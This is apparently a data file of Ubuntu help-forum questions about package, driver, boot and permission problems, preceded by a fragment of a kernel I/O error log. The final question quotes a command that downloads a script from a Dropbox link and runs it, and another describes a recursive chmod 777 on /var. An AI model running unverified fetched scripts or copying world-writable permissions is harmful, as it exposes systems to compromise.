driverbyte=driver_ok [ 728.181756 ] sd 5:0:0:0 : [ sdb ] cdb : [ 728.181759 ] read ( 10 ) : 28 00 12 47 20 f0 00 00 f0 00 [ 728.181769 ] end_request : i/o error , dev sdb , sector 306651376 [ 728.181797 ] jbd2 : failed to read block at offset 25374 [ 728.181822 ] jbd2 : recovery failed [ 728.181827 ] ext4-fs ( sdb1 ) : error loading journal [ 881.721482 ] type=1400 audit ( 1394916303.610:70 ) : apparmor= '' denied '' operation= '' capable '' parent=1 profile= '' /usr/sbin/cupsd '' pid=940 comm= '' cupsd '' pid=940 comm= '' cupsd '' capability=36 capname= '' block_suspend '' [ 1168.916096 ] usb 2-1 : reset high-speed usb device number 5 using ehci-pci [ 1199.952133 ] usb 2-1 : reset high-speed usb device number 5 using ehci-pci [ 1230.928074 ] usb 2-1 : reset high-speed usb device number 5 using ehci-pci [ 1262.032124 ] usb 2-1 : reset high-speed usb device number 5 using ehci-pci [ 1262.197640 ] sd 5:0:0:0 : [ sdb ] unhandled error code [ 1262.197654 ] sd 5:0:0:0 : [ sdb ] [ 1262.197659 ] result : hostbyte=did_abort driverbyte=driver_ok [ 1262.197665 ] sd 5:0:0:0 : [ sdb ] cdb : [ 1262.197669 ] read ( 10 ) : 28 00 12 47 20 f0 00 00 f0 00 [ 1262.197690 ] end_request : i/o error , dev sdb , sector 306651376 [ 1262.197732 ] jbd2 : failed to read block at offset 25374 [ 1262.197764 ] jbd2 : recovery failed [ 1262.197774 ] ext4-fs ( sdb1 ) : error loading journal
433265	apt-get does not work without an internet connection . how can work around this ?	i have a host which is firewalled to the point where apt-get is unable to download packages . that host does not have access to a proxy . i know in gentoo i could work around the problem by fetching the necessary files using a second host and placing the files in /usr/portage/distfiles . does ubuntu have a similar place i can stash the files to work around the lack of internet access ?
433269	403 forbidden access apache on ubuntu full access	we had an issue with our sites on our ubuntu server . basically we did a chmod -r 777 on the var folder to grant full permissions . is that ok to do ? lrwxrwxrwx 1 ftpuser ecoftpgroup 30 2011-06-03 15:37 mywebsite.co.uk - > /var/www/clients/client5/web6/ how can i also find info about the user and group as stated in the line above ? it was working fine yesterday and today we got the 403 forbidden error .
433270	copying files in ubuntu from downloads dir to computer dir	i want to copy a folder colors from ~/downloads/vim-colorschemes-master to etc/vim/colors . i tried this as instructed : cp colors/* ~/etc/.vim/colors but i am getting the error : cp : target â/home/advenio/etc/.vim/colorsâ is not a directory how do i copy the colors contents from the downloads to the vim dir . i am a windows guy but trying to grasp unix system . i will really appreciate if you can help me . thank you .
433274	should i use maas and juju if i only intent to use a single pc ?	i am planing to setup a local server at my home that i will use for various entertainment/work tasks . do you think that installing maas and juju is an overkill if i intent to use only one pc ?
433281	how can i prevent jupiter from disabling my touchpad ?	i recently installed jupiter 0 . 1 . 9 . i think it is disabling it . how can i prevent jupiter from disabling my touchpad ? i 've uninstalled jupiter and it is working fine . i want to use jupiter , but at the same time i do n't want it to disable my touchpad automatically on startup . how can i do this ?
433282	how to open gtk apps at center of screen ?	how to code this using quickly ? will frameless gtk apps work the same ?
433284	hp printer scanner re-installation problem	i have hp all in one deskjet 1050 that time and again do not identifies scanner in ubuntu 12.04 . almost two months ago i re-installed the latest driver from hp website for all in one ( printer worked but not the scanner ) , 2-3 months before that i again had to do the same . why do i need re-installation every time for using its scanner , when their is no issue with printing , it is seriously affecting my work and causing time loss ? any help will be appreciated . thanking you all in advance .
433287	ubuntuone auth failed	i have a dual boot notebook ( windows 7 and xubuntu 12.04 ) . the ubuntu one client is installed on both systems , each one with a different sync folder ( c : \user\a\ubuntu one , home/b/ubuntu one ) ubuntuone client was running fine until i booted windows where i got an error from ubuntuone client . so i upgraded ubuntuone client , started the synch process and it worked . when i booted ubuntu again i get a `` file sync error . ( auth failed ( auth_failed ) ) '' . i read this question but i ca n't find the 'passwords and keys application ' in xubuntu both from the accessory or from system settings . i have tried a completely re-install of the ubuntuone client but it was unsuccessful . i think that the issue might be due to a different user files owner ( a on windows7 , b on ubuntu ) . how can i fix it ? should i remove the ubuntuone client for windows7 and get only the ubuntu version ?
433290	how to add a genitive phrase to vim spellchecker ?	how can i make vim 's internal spellchecker ignore the genitive form of phrases added to a spellfile ? for example , how can i make the spellchecker ignore `` nicolai 's '' when `` nicolai '' has already been added to the spellfile ( without having to add `` nicolai 's '' to it as well ) ?
433294	run .bash_profile script at login	i 'm working on a deb package that allows the administrator to create another account and run that account automatically in kiosk mode . i created the user , specified a shortkey and put that in a hidden file , and created a .bash_profile script on the admin account that i copy to the new user 's home folder . this is the script i 'm running to create the files and specify the shortkey : # ! /bin/bash basis= '' primary + alt + `` shortkey=`zenity -- entry -- text `` your shortkey will be a combination of < primary > + < alt > + a letter\n\n specify your letter ! `` ` while [ [ $ shortkey = * [ ^a-z ] * ] ] ; do zenity -- warning -- text `` input incorrect\n\ntry again '' shortkey=`zenity -- entry -- text `` your shortkey will be a combination of < primary > + < alt > + a letter\n\n specify your letter ! `` ` done basis= '' $ basis $ shortkey '' zenity -- info -- text `` $ basis '' -- title= '' your shortkey '' touch kiosk/kiosk-0.1/.mykey echo `` gsettings set org.gnome.desktop.wm.keybindings close [ $ basis ] '' > kiosk/kiosk-0.1/.mykey user= $ ( cat kiosk/kiosk-0.1/.username ) keys= $ ( cat kiosk/kiosk-0.1/keys ) content= $ ( cat kiosk/kiosk-0.1/.mykey ) touch kiosk/kiosk-0.1/.bash_profile echo `` # ! /bin/bash '' > > .bash_profile echo `` '' > > .bash_profile echo $ keys > > .bash_profile echo $ content > > .bash_profile chmod +x .bash_profile chown $ user .bash_profile mv '.bash_profile ' /home/ $ user that content that is copied to .bash_profile contains code to disable all the keys from the interface like : gsettings set org.gnome.desktop.wm.keybindings begin-move [ ] now i only added a line to start the chromium browser to the right website /usr/bin/chromium-browser www.google.be -- kiosk -- no-default-browser-check -- disable-translate i also changed the owner of the .bash_profile script to the account user and made it executable before i copied it to the new users home folder . now when i login on the new user , this script does nothing . can anyone see where i 'm wrong of help me finding the solution ?
433295	how do i create curly brackets using shift + alt	i 'm used to writing curly brackets using left shift + left alt + 7 or 0 . as of right now i can only do them using the right alt + 7 or 0 . how do i configure my left alt + left shift to behave as right alt ? i 'm using ubuntu 13.10 on a macbook pro 2011 . i 've previously changed my xmodmap to switch the command key and control key ( using this ) , and it looks as follows : clear control clear mod4 keycode 105 = keycode 206 = keycode 133 = control_l nosymbol control_l keycode 134 = control_r nosymbol control_r keycode 37 = super_l nosymbol super_l add control = control_l add control = control_r add mod4 = super_l
433296	black screen appear after set default display manager gdm	yesterday i install gdm and set it default display manager then l notice ubuntu is running but there is several lines appear on desktop when i want to shutdown system after i powered off system and start grub menu appear and normal boot system but nothing is appear and black screen is regularly appear even after several restart .
433297	find/tar combination to backup certain files at one level , and all files in one subdirectory	our server 's directory structure is like this /home/site1/public_html /home/site1/logs /home/site1/cgi-bin etc ... ( it 's the standard when using virtualmin ) what i want to schedule backups for is the public_html directories + some files at the site1/ level ( there are often some handy scripts written in those levels , but also there are inevitably a bunch of bloat files there too like temp db dumps that i do n't want filling up the backup server every job ) here 's what i would like to do if possible ( from /home/ ) : tar -cz -- include= '' *.sh '' -- include= '' *.php '' -- include= '' public_html/* '' ./site1/ | ssh backupserver ... but , tar does n't have an include option , only exclude . i 've tried find ./site1/ -type f -name `` *.sh '' -or -name `` *.php '' -or -wholename `` ./site1/public_html/* '' | xargs tar -cz | ssh backupserver ... but that does n't work either because xargs breaks a large list of files into chunks , causing every restart of the tar -c command to overwrite the previous file ( and if i do n't use xargs , then there is an error for the list being too long ) . i ca n't use the -r option to append to the backup because 1 ) it does n't work on compressed archives and 2 ) i do n't think that could work across ssh anyway . the only solution i can think of is to break it into steps creating a temporary tar file locally ( one to tar ./site1/public_html/ and another to append ./site1/* . [ sh|php ] ) , then zipping , then ssh , then delete the local file . but that seems almost ridiculous on linux . is there some format to the tar command that i can use that i 'm missing ?
433304	booting issues booting windows xp after installing ubuntu 12.04	after installing ubuntu 12.04 on my system , windows xp wo n't boot any more . ubuntu starts ok however . when starting windows in the grub menu , it give 's an error : error : unknown filesystem . grub rescue i 've tried to resolve it using boot-repair but with no result . also tried the booterrorfix as suggested but no result . boot-repairs logs the following info : http : //paste.ubuntu.com/7079160/ your support is much appreciated .
433306	how to remotely view tty1 stdout at pts/0 where the command runs ?	ubuntu 13.10 ( saucy ) is running inside a parallels desktop version 8 for mac virtual machine ( kvm ) and has telnet installed for remote access . to remotely access ubuntu , the mac terminal application is used . inside terminal the telnet < hostname > command was used and later on a fakeroot ... to start building a custom kernel . however when compiling the kernel , cc1 failure output ( out of memory : kill process ) is shown on virtual console # 1 ( tty1 ) display and not inside the telnet session running at pts/0 where i need the stdout output . update # 1 i have read : how can you mirror the stdout of one terminal to another one ? redirect console to /dev/pts/0 the console man page but that does n't give me enough clue . question how to : remotely access tty1 inside a terminal application ? or show the tty1 output in the corresponding pts session where the fakeroot ... command was executed ? or show the tty1 output in all pts sessions ?
433307	after 13.10 install none of my apps appear in the dashboard , only social network apps ( of which i have none )	after 13.10 installation none of my apps appear on the dashboard so effectively i can not launch any apps from the dash only through the terminal . any advice ?
433312	broken packages from versions mismatch	i 've been trying to fix some dependencies to install cinelerra , and stupidly install libvpx1 : amd64 for sid and it casued a broken package . synaptic could not fix it . i tried apt-get install -f and it gave me the following : zhd ~ # apt-get install -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... failed . the following packages have unmet dependencies : libvpx1 : breaks : libvpx1 : i386 ( ! = 1.3.0-2 ) but 1.2.0-2 is installed libvpx1 : i386 : breaks : libvpx1 ( ! = 1.2.0-2 ) but 1.3.0-2 is installed e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies i 've tried removing libvpx1 : amd64 , and it says it can not because libvpx1 : i386 is a different version . i 've tried the other way round by removing libvpx1 : i386 , and it says it can not because libvpx1 : amd64 is a different version . i can not downgrade or upgrade either of these packages to try and make them the same version . if anyone has some suggestions i 'd be glad to hear ! aptitude gives some solutions , but involves uninstalling half of my software ... .
433315	how to prevent other hosts on the same network from cutting of my internet connection ?	recently , i 've noticed that my internet connection -- wireless on a public wifi network -- has been cut off many times , and i think this may have been done maliciously or deliberately ( for example , by users running netcut on different systems ) . how can i accomplish this ?
433316	howtofix : invalid rom contents	i bought a laptop `` toshiba satellite c55-a-1f5 '' , which had installed win8.1 and i want to switch it to ubuntu . after the installation of ubuntu 13.10 and the first reboot , it was seemed like bios does n't work , cause when u power-on the laptop , it does n't display `` toshiba ... '' , which it should do . instead of display a message `` invalid rom contents '' and some others ( 2 lines ) , which i can obviate to read it : ( . what can i do to fix this ? sorry for few details but i am newbie on ubuntu and believe me it looks me really hard . any suggestions are welcome ! !
433317	pig ( grunt shell )	i am new to hadoop and pig . i recently followed a tutorial and i installed hadoop-1.2.1 and pig-0.12.0 on ubuntu 12.04 lts . once i finished everything i reloaded the .bashrc by typing source .bashrc and after that i typed the following command : $ pig . unfortunately the grunt shell did not appear . can anyone tell me what i need to do please ?
433320	wifi not responding on lenovo z710	i have installed ubuntu 12.04 lts on my new lenovo z710 . it connects with the wifi but mozilla does not show the home page ( google.com ) . kindly suggest a solution . warm regards , amit .
433329	how to remove a path from system path ( ` $ path` ) using terminal commands ?	i added a directory path to system path ( $ path ) by running , export path= $ path : /home/avinash/desktop/raj now my path look like this , $ echo $ path /usr/lib/lightdm/lightdm : /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games : /home/avinash/desktop/raj i want to remove /home/avinash/desktop/raj from system path variable by using command ( like export command does on adding path ) .
433332	gksudo from a non sudoer ?	i want to run gui applications that require admin privileges from gksudo/gksu on a non-sudoer account . currently , i can just run sudo guiapplication from a sudoer tty , and will be able to display/use the application as a sudoer most of the time . there are times when this causes conflicts . to get around this , i 've been trying to use gksu and gksudo . both commands gksudo -slu sudoerusername guiapplication gksu -slu sudoerusername guiapplication do n't seem to work from the non-sudoer 's tty ( it says its asking for the sudoer 's password , but will only use the non-sudoer 's password and says that sudo does n't allow me to run the command ) . i do n't really want to use xnest/xhost as it 's a pain to limit who can use the xhost . anyone know of a way to run gksudo or gksu from a non-sudoer terminal ? edit : i 've also tried running export display=:0 on both the sudoer 's and non-sudoer 's terminal , and then running gksu/do from the sudoer 's terminal , but it says it can not display on :0 .
433333	what does this ( root ) cmd line in system.log mean ? why is it there ?	what does it mean ? ( root ) cmd ( [ -x /usr/lib/php5/maxlifetime ] & & [ -d /var/lib/php5 ] & & find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin + $ ( /usr/lib/php5/maxlifetime ) ! -execdir fuser -s { } 2 > /dev/null \ ; -delete ) found it in system.log .
433336	is it possible to deploy a ha mail server using juju ?	i 'm looking for a way to easily deploy a highly available e-mail server using juju . does anyone accomplished that already ? are there charms available for this ? thank you
433342	creating an adhoc connection	when i create a wireless adhoc network , ubuntu keeps switching back to my router . i ca n't see the network i created on my other computers either . in fact , i do n't think it ever creates the network.. i 've searched on google for people having similar problems and found this : http : //ubuntuforums.org/showthread.php ? t=1412707 so i made sure that i uninstalled dnsmasq and only have dnsmasq-basic installed . but the problem still persists . i need to create an adhoc network so that i can connect to my printer .
433344	total freeze after nvidia driver installation	hi my problem is that after installing the latest nvidia driver i ca n't even come past the login screen . keyboard and mouse are n't working and i have no idea what i did wrong .
433349	hp laser jet 1102w	my hp laser jet 1102w worked perfectly with previous versions until i did a fresh install with ubuntu 13.10 64bit . package hplip is installed and up to date ( v3.13.9-1 ) . the printer shows up as `` ready '' in the system printers menu , but cups reports `` filter failed '' when i send it a job . edit : according to hplip , i needed to install a proprietary plugin using hp-setup . i did so and the printer works . i do n't remember doing this on previous versions , but oh well !
433350	how can i safely downgrade from php 5.5 to 5.4 ?	i 'm wondering if theres safe steps to downgrade from 5.5.9 to 5.4 . i upgraded earlier this morning , this was purely accidental as i was trying to fix some package issues and now some pages are n't working . are there safe steps/precautions i can take to downgrade ?
433351	ubuntu software store not working	i try to install or un-install some think and i get this : installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 222127 files and directories currently installed . ) removing vlc ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf-2.index ... processing triggers for mime-support ... processing triggers for man-db ... processing triggers for vlc-nox ... dpkg : error processing python-wxgtk2.8 ( -- configure ) : package is in a very bad inconsistent state - you should reinstall it before attempting configuration . dpkg : dependency problems prevent configuration of playonlinux : playonlinux depends on python-wxgtk2.8 ; however : package python-wxgtk2.8 is not configured yet . no apport report written because the error message indicates its a followup error from a previous failure . dpkg : error processing playonlinux ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : python-wxgtk2.8 playonlinux error in function : dpkg : error processing python-wxgtk2.8 ( -- configure ) : package is in a very bad inconsistent state - you should reinstall it before attempting configuration . dpkg : dependency problems prevent configuration of playonlinux : playonlinux depends on python-wxgtk2.8 ; however : package python-wxgtk2.8 is not configured yet . dpkg : error processing playonlinux ( -- configure ) : dependency problems - leaving unconfigured
433352	turn off localization in ubuntu	okay so when i install ubuntu and i set my timezone to belgrade parts of the interface are in serbian , cyrillic . that annoys the hell out of me . some programs are entierly in serbian even though i installed with english keyboard us layout etc . no where in the install process did i pick serbian for anything . once i install ubuntu the name of months , days and some programs is , like i said , in serbian . so i go to language support and text entry and set everything to english there but i see no changes whatsoever . anyone has any idea on how to fix this ? preferably before i install the system ? some hidden config during the installation or something ... whose stupid idea was it anyway to automatically translate half of the interface depending on your timezone anyway -.- do you guys think i should maybe raise a ticket on launchpad ?
433353	copy text from libreoffice writer to text file using terminal	i am connecting to my ubuntu 12.04.4 lts server via ssh . and i want to view my libreoffice writer notes remotely . i need a way to copy text paragraphs from .odt files to a normal text file . this way i can read customer reports uploaded via our support web application without the need to download all the .odt files
433355	`` super '' key and vmbox	i have recently installed vmbox and have win7 on it . i would like that my `` super '' key does n't trigger unity interface , but works only in guest os . found the setting `` catch keyboard '' , but this does n't help
433356	how to fix this rsync script ?	rsync directory always starts in the home directory , but i want to sync files into a directory inside of a .kde directory . i tried this : rsync -avc -e ssh root @ xxx.xx.x.xx : /var/www/ ... /backup/docdata ../../.kde/share/apps/okular/docdata and many other ways , but i cant find the right way to get into the .kde can somebody help me out ? this is the error rsync throws : receiving incremental file list rsync : mkdir `` /home/jakob/.kde/share/apps/okular/docdata '' failed : no such file or directory ( 2 ) rsync error : error in file io ( code 11 ) at main.c ( 656 ) [ receiver=3.1.0 ]
433362	shell script + mutt : mutt terminating while loop	i am having a problem with mutt exiting my while loop prematurely in my shell script . the while read mailto loop of my function sendfiles will only process ( send ) the first file and then returns . however , if i comment-out '/usr/bin/mutt ' from the function all the files in the directory are processed properly . anyone know why this behaviour is occurring and how to fix it ? # ! /bin/sh # sendreports.sh # sendfiles function sendfiles ( ) { cd $ 1 ls -1 * @ * | while read mailto do echo `` emailing file : $ mailto '' /usr/bin/mutt -s `` your file '' -a $ mailto -- $ mailto rm -f $ mailto done } # ... . later in the life of this script ... . sendfiles /tmp/reports # ( end of file )
433365	how to install unity3d game engine on ubuntu	i downloaded unity 3d game engine from the official website . i tried to install using this command : wine unity*.exe done . then trying to open i get the following error : error initializing license system
433367	boot ubuntu on a laptop with dos	i have a new laptop and it only has dos on it . i want to know how to install it with an external hard disk drive or do i need an usb-stick ? i would like to remove the `` medium '' after the installation . is that possible and how ? i am a complete linux beginner , so simple step by step instructions would be very nice . thanks a lot .
433369	is there some user interface or gtk package for gstreamer ?	i have just installed package gstreamer 1.0 , and i use as executable the file located in : /usr/bin/gst-play-1.0 . all is fine , i can play local files , and also i can use 'gst-play-1.0 ' in tv-maxe to watch live video streams . i was wondering if there is some gui or a gtk package in a repository out there to make gstreamer work with the keyboard so i be able to see videos in fullscreen , and maybe pause the video or even change brightness and so on . fulscreen feature would be nice to have for gstreamer . i have read lots of tutorials on the internet but they are all for developers , and advanced linux users , i ca n't understand nothing from those scripts and suggestions . for the moment i can watch videos and live streams adjusting the screen size manually , it is not that bad , image and sound are great , but maybe someone knows a package that works for gstreamer , and includes a very useful interface for the average user ?
433370	how can i get a dvd to play ?	when i insert a dvd , videos said it cant be played . so i go into the disc and select a vob file and that does not work.iâve tried vlc and it still does not work . please help !
433372	unable to unlock after locking when virtualbox is in full screen mode	i 'm running 13.10 as host , with a virtualbox 4.2.16_ubuntu running windows 8.1 as guest . i had the virtual machine in full screen mode when ubuntu locked due to inactivity . i tried to wake the machine and discovered the standard unlock screen , where i could move the mouse pointer but could not type any characters into the password box . i switched terminals , logged in , and shutdown the virtual machine programatically . however , i was still unable to type in the password box on the lock screen . i ended up just rebooting the real ( host ) machine , which worked fine i guess : -/ two questions : any idea what happened here ? is there a way to resolve this without rebooting the whole computer ?
433375	show application switcher in all displays	how can i configure the application switcher to be shown in all displays in gnome shell ? can i do the same with the activities search and menu ?
433376	trouble with booting win 8 alongside ubuntu 12.04	i am having problems with my lenovo e531 . i have decided to try and install ubuntu . so i did a hdd partition in windows ( with a program from aomei ) , then downloaded ubuntu 12.04 and installed it from a liveusb . further on i wanted win8 to boot as a default os , not having to select win8 in grub2 was the goal . so i used boot-repair , twice already , tried switching secure-boot off and on again many times , changed boot priorities and so on . but unluckily i ended up with being unable to boot win8 . i reckon that after running boot-repair you need to select `` windows uefi boot loader '' to start up win8 ( when choosing the standard option `` windows 8 '' , you get the notorious reply `` command drivemap unknown '' or something along those lines ... ) . however , whenever i do that , it only jumps to the win8 logo - with a rotating circle underneath - indicating that it is loading , in my case infinitely . is repairing win8 with their recover dvd/troubleshooting guides the only option ? ( i would rather not lose my files , though the majority of them is backed-up . ) i have tried many of the manuals here on ask ! or throughout the internet without success . if anything strikes your mind , please help . thanks
433380	how to vertical scale a juju service unit ?	suppose i deploy a postgresql charm with 3 units . when i deploy , i will use a ec2 small instance . how can i change the instance type of those units after those 3 units are already running ? is this handled automatically ? thanks !
433382	tesseract ocr engine on ubuntu how to	ive installed tesseract-ocr , was looking at the manual but i cant see an option that i can select an image bounds ( x , y , w , h ) can someone help about it , or am asking in a wrong place ?
433383	split vpn ( pptp ) in ubuntu 13.10 not working -- router problem ?	i ca n't setup successfully a split-vpn on ubuntu 13.10 . i followed this guide , or this or this . adding a route manually for the vpn-secured part allows successful ping 's to vpn-resources as well as standard internet domains ( like google.com ) . ssh into a remote machine works , too . also , syslog reports the correct nameservers . but after 1 minute or so , the vpn part stops working . ping reports unknown hosts for the private resources , ssh freezes . route still shows all correct routes , though . looking into syslog , no error messages are available . trying to stop/restart the vpn client does usually not help . the standard vpn setup ( not trying to split the tunnel ) works without problems , but does not allow any external internet addresses , of course . any ideas ? update : using one of the above guides and running in a different wlan network , no problems seem to occur . so could that problem be connected to my router ( a fritzbox in my case ) ? update 2 : in order to check the router , i connected via a windows machine to the vpn . the same behavour as described above can be observed -- this seems to be a problem with my router , then .
433385	get workrave to treat video watching as `` work '' , not rest	i use workrave not just to avoid rsi , but also as a tool to save my eyes . i only have the rest break set up every 70 minutes . the problem is that it treats events like video-watching as inactivity and resets , then stop the timer till i 'm done watching the video , which can be hours if i 'm watching something engrossing ( i generally use vlc for playback ) . the inactivity reset is great when i 'm working , because it treats periods i spend away from my computer ( walking around or answering a phone call ) as breaks . the only qualm i have is with video playback being counted as idle time . how do i solve this ? suggestions for other software that meet my criteria are most welcome . specifications : ubuntu 13.10 64bit , workrave-1.10.1
433386	how can i get into my ubuntu server with my mobile ?	i know how to see/login trought a computer , but how do i view them from my mobile . i have a samsung galaxy s3 . android .
433388	windows 7 hangs at grub 's purple screen when dual booting	i have installed a new laptop ( lenovo z510 ) for dual boot ubuntu 12.04 and windows 7 64 bit . after several trials it now works , but i have a strange effect . i always enter the grub purple screen fine . ubuntu always works . when i want to boot windows however windows boots fine ( i hear the windows start sound ) but i only see a blank , purple grub like screen . i can operate windows though , pressing three times the tab key and then enter shuts the pc down successfully . sometime a trick works like that : i press just the power key and the pc hibernates . when i switch on the pc afterward and choose win7 in grub again everything is working fine , this time with working screen . however i had to find the trick does not always work - maybe whether it works or not is just random : - ( the workaround is quite dirty , what can i do to get rid of it ? thanks for your help !
433391	loud beep occurs whenever i plug in a usb drive ( and other related anomalies )	not much of a forum guy , but after weeks of troubleshooting and searching , i have n't resolved this issue . basically , i have a 500gb 2.5 '' sata drive that i keep in an enclosure , which is attached to my laptop via usb most of the time ( mainly for the purpose of making incremental backups through duplicity , but nothing is automated ) . this drive is formatted ext2 . there are two problems i 've been having when using this drive : when plugging it into a usb port , my computer emits a short , but loud beep . this beep is audible through external speakers or headphones plugged into the headphone jack , and through the built-in speakers , when nothing is occupying the headphone jack as well . when performing a search on said drive , with a tool like catfish or gnome-search-tool , my computer will sometimes emit the same beep i described above . the drive itself seems to function just fine , and neither gnome-disk-utility or gparted report any issues with it . it should also be noted , that the beep always occurs when plugging it into one of the usb ports on the right side of my laptop ( the same side that my headphone jack and line-in jack are located on ) , but only sporadically occurs when plugging it into one of the usb ports on the left side of my laptop ( the same side that my esata and serial ports are located on ) . this issue does not rear its head when i plug in other usb devices ( but the only other usb devices i use are a fat32 formatted flash drive , and the logitech unifier for my wireless mouse ) . i have not been able to remedy these issues and do n't see anything in the system logs i 've checked ( syslog and xorg.0 ) that seems relevant . i have not been able to disable the beep ( and i 've tried every approach listed here ; http : //earthwithsun.com/questions/602602/beep-in-headphone-when-usb-mouse-is-plugged-in-or-moved and here ; http : //ubuntuforums.org/showthread.php ? t=865642 ) or gain an understanding of what it signifies . i have even disassembled , cleaned and reassembled the drive enclosure to no avail . any help would be greatly appreciated . thanks in advance ! other potentially relevant information : - my laptop is a kudu professional from system76 ( a.k.a ; clevo w670szq ) . - i am currently running xubuntu 13.10 as my sole os . - i also have a 1tb drive attached via esata most of the time .
433394	restart of ubuntu	i have ubuntu 12.04 , kernel 3.8.0-37 my problem is that anytime i restart laptop will not start . system shuts down as it supposed to , but then some beeps go out and nothing happens . computer is not dead as i hear fans running but system will not start . i have to press button to turn it off and then turn it on again . everything works afterwards . can you please help me to find out what might be wrong ? thanks
433397	strange problems with various search tools ( catfish & gnome-search-tool )	i have been experiencing a very odd set of problems with both the catfish and gnome-search-tool utilities . the problems occur more consistently in catfish search , but are still present from time to time in gnome-search-tool as well . the issue is as follows : when using either search tool , accessing an item from the list of results via the context menu , does not perform the desired action . so , for example , when i choose to open the containing folder of an item , sometimes the item itself is opened in an editor . when i choose to open an item directly , sometimes the folder which contains it is opened in my file manager . to make things worse , there is even an issue where accessing an item with either of those options , doesnât work at all , in that , a completely different file or folder will open , which is definitely not the one i specified . these issues make using either search utility quite dangerous . any help remedying this situation would be greatly appreciated . thanks in advance . other potentially relevant information : - using locate from within the terminal , or using the linelight xfce panel plugin ( a graphical interface to locate ) do not seem to bring up these issues . - my laptop is a kudu professional from system76 ( a.k.a ; clevo w670szq ) . - i am currently running xubuntu 13.10 as my sole os .
433400	how to install nmap in ubuntu 12 ; 04	hi every one i am new to ubuntu before i was using the backtrack 5 r3 in which every thing was installed but when i came to ubuntu i get confused every thing is change please some body give me little description about how to install nmap in ubuntu with some useful link if you people can .
433402	reinstall windows xp on dual boot with ubuntu and then by mistake formatted hard disk partiton and it also get excluded ..how to get it back	i am irfan ... i have installed both ubuntu 12.o4 lts & windows xp 2 ..but when xp 2 not working properly i want re install it with xp 3 ... all things gone ok untill i go to my computer ..manage after xp 3 successfully installed..in that i format by mistake my 2 more partition ... and there is a message that they are excluded ..now in that part my very important data ... .so i want to get it back ... so please help me out sir ... immediately answer all posssibilities ... .
433403	weird sound issues	i am on ubuntu 12.04 ( precise pangolin ) . and my sound does not work ... usually there is a sound icon at the status bar and i control sound there . i can use ( alsa gnome sound mixer ) to control ... so its not a speaker problem . what should i do to get the sound working ? thanks in advance !
433406	trailing mouse and other small graphical glitches , unable to install proprietary drivers in 14.04	so i 've been trying to get various distros ubuntu running on my pc for a few months now , on and off . i recently had success with 14.04 on my laptop so i decided to give it a go on my pc , especially because my pc is running fairly new hardware . as it says in the title it does n't quite work , it 's a little laggy and there are a few graphical glitches . i tried to install nvidia-current and it seems as though the module causes everything to break . when i say everything , i mean i just get a blank screen with a blinking cursor . i ca n't even switch to a tty , it does n't seem to get that far . i ca n't even uninstall the module , i have to reinstall everything . here 's the output of lspci | grep vga 00:02.0 vga compatible controller : intel corporation xeon e3-1200 v3/4th gen core processor integrated graphics controller ( rev 06 ) 01:00.0 vga compatible controller : nvidia corporation gk106 [ geforce gtx 660 ] ( rev a1 ) so as you can see , it seems to think i have two graphics controllers ? here are my machine specs : motherboard : gigabyte z87-hd3 processor : intel core i5-4430 ( haswell ) video : geforce gtx 660 windforce is this a switchable graphics type deal ? i tried installing the intel graphics bundle but it 's not supported on 14.04 yet so i tried installing individually and it did n't seem to have any effect . it should n't anyway because my video output is going though my nvidia card . i 've had a look at the uefi settings screen but i ca n't see anything of relevance .
433408	my netbeans is not working after i deleted the jvm folder	my netbeans is not starting since i deleted the /usr/lib/jvm folder . but i have installed java jdk 1.7.0_51.deb file and the file dir is /usr/java . when i tried to start the netbeans using terminal the following message came out : ***error occurred during initialization of vm java/lang/noclassdeffounderror : java/lang/object*** what should i do ?
433412	screen flickering ubuntu 13.10 radeon 7970m 14.2 catalyst beta drivers	i recently installed the 14.2 catalyst beta drivers for my 7970m , i wanted to be able to choose to use it or intel hd graphics . it works well except for when at the ubuntu screen there is a graphical glitch but that is n't really a problem . however , when i tried to connect an external monitor , it became almost impossible to use . the screen flickers and has this weird tearing and it also seems to move the launcher into the middle of the screen and display half of the content to the right of it . when i mirror the displays or enable either one while connected , everything works fine . also , if i switch to the intel hd graphics in the catalyst control center and restart , dual monitors work fine . any help is appreciated .
433416	backslash not working	i am facing a problem with my backslash . whenever i press control backslash this ( # ) comes out . i tried to press alt right that does n't work as well . initially everything was working perfect this happened after removing the debug port . if anyone knows the solution please try to help me as i am writing my dissertation on latex and this key is really crucial . thanks
433419	crosshair as standard mouse pointer . but how ?	all i want is to change the default mouse cursor ( the upward pointing arrow ) into a crosshair . i do n't need instructions on how to download a cursor theme , i just want a crosshair as the standard pointer . that 's all . but i ca n't get it done . ca n't find a theme with a crosshair as default cursor , either . i do have a windows .cur file with the perfect crosshair pointer . can that be imported , perhaps ? whatever is possible to get me that crosshair , please provide extensive instructions because i 'm new to this . thanks .
433420	wireless does n't work ( hp635 notebook pc ) ( ubuntu 12.04 )	i installed ubuntu 12.04 most everything is working except the wireless . i have tried many solutions but none of them worked . the original issue before complicating it by installing several drivers for different devices is rfkill list all shows a hardblock . can anyone help resolve this issue ? as requested : wget -n -t 5 -t 10 http : //dl.dropbox.com/u/57264241/wireless_script & & chmod +x wireless_script & & ./wireless_script output ( wireless-info.txt ) : http : //pastebin.com/5cmcpcu0 ( some changes ) http : //pastebin.com/awk8wnid
